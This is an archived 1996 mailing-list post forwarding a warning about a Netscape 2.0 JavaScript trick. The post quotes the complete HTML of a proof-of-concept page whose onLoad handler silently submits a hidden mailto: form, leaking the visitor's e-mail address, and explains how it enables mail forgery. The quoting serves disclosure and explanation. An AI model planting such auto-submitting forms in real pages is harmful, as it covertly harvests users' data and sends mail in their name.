[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
JavaScript to grab e-mail <explained> (fwd)
This is something that i had not seen posted here as of yet. (Sorry if it
has. My mail feed has been suffering from altzheimers as of late and
getting progressivly worse...)
Crypto Relevance: None
Privacy Relevance: Lots
This was forwarded to me by the "CGI Guy" at Teleport. I had heard this was
possible. I was quite surprised to find just how *easy* this is! I can see
a number of creative (and scary) uses for this little hack. (This makes
JavaScript seem more like a coffee enema.)
--------- Forwarded message ---------------
>Well, here it is... I've been yelling about Netscape's use of the
>action="maito:[email protected]" for a long time. By clicking on a submit
>button (with any name) you can grab the user's email address, sig file
>and other prefs.
>
>JavaScript in Netscape 2.0 removes the necessary "click." I'm sending
>visitors to my site a notification of this problem.
>
>Robert Muhlestein
>Teleport Creative Services
>CGI Guy
>[email protected]
>
>---------- Forwarded message ----------
>Date: Mon, 26 Feb 1996 16:52:30 +0100
>From: Lincoln Stein <[email protected]>
>To: [email protected], [email protected]
>Cc: [email protected]
>Subject: Re: JavaScript to grab e-mail <explained>
>
>I just had a look at the e-mail scamming script (URL
>http://www.popco.com/grabtest.html). It's quite simple. Here's the
>complete text:
>
><HTML>
><HEAD>
></HEAD>
><BODY onLoad="document.mailme.submit()">
>
><form method=post name="mailme"
> action="mailto:[email protected]?subject=scammed address">
>
><h3>Viewing this page automatically submits email to an
>address which then sends you back email to prove it grabbed the message.</h3>
>
><input type=hidden name="scammed.the.address" value="did it">
></form>
>
></BODY>
></HTML>
>
>Basically what the script does is to make the browser submit e-mail to
>the indicated mailto: URL. When the mail is sent, the user's reply
>address is included as a matter of course.
>
>The good news is that this does _not_ represent a general security
>hole in JavaScript itself. I was concerned that someone had
>discovered a way to make JavaScript divulge such browser secrets as
>the contents of the disk cache, history list, or newsgroup
>subscriptions.
>
>The bad news is that this technique can be used as a general Internet
>e-mail forgery system. Anybody accessing a particular page will
>unwittingly mail out an e-mail message, whose recipient, subject and
>message body are all under the control of the JavaScript author. If
>the message is traced back, it will be found to have originated from
>the user's machine.
>
>Lincoln
>
>
---
Alan Olsen -- [email protected] -- Contract Web Design & Instruction
`finger -l [email protected]` for PGP 2.6.2 key
http://www.teleport.com/~alano/
"We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
- Bill Clinton signing the CDA with the First Amendment bent over.